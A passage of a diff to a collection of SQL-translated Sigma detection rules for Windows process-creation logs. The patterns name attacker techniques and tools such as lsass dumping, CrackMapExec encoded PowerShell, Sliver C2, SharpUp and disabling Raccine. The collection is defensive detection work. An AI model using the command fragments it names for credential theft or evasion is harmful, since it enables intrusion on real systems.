'%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "title": "Renamed AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" - }, - { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", - "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentProcessName = '') OR (ParentProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "description": "Detects RDP session hijacking by using MSTSC shadowing", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Raccine Uninstall", + "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" + "Legitimate deinstallation by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Suspicious Runscripthelper.exe", + "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", - "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "status": "experimental", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.privilege_escalation", + "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%}\\\\%' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - 